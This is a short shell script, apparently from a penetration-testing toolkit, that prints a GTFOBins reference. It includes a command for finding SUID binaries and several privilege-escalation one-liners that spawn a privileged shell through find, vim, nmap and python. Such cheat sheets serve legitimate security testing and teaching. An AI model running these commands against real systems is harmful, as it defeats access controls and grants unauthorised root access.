#!/bin/sh
SCRIPT_DIR="$(cd "$(dirname "$0")" && pwd)"
. "$SCRIPT_DIR/../common-script.sh"

echo ""
info "=== GTFOBins Search ==="
info "GTFOBins is a curated list of Unix binaries that can be used"
info "to bypass local security restrictions (SUID escalation)."
echo ""
info "Search online:"
echo "  https://gtfobins.github.io/"
echo ""
info "CLI search (requires curl + jq):"
echo "  Search by binary name using the GTFOBins API"
echo ""
info "Examples:"
echo "  SUID - find . -perm -4000 2>/dev/null"
echo "  Then check each binary at gtfobins.github.io"
echo ""
info "Common privesc bins:"
echo "  nmap --interactive"
echo "  find . -exec /bin/sh -p \\; -quit"
echo "  vim -c '!sh'"
echo "  python -c 'import os; os.execl(\"/bin/sh\", \"sh\", \"-p\")'"
echo ""
info "Running: displaying GTFOBins info"
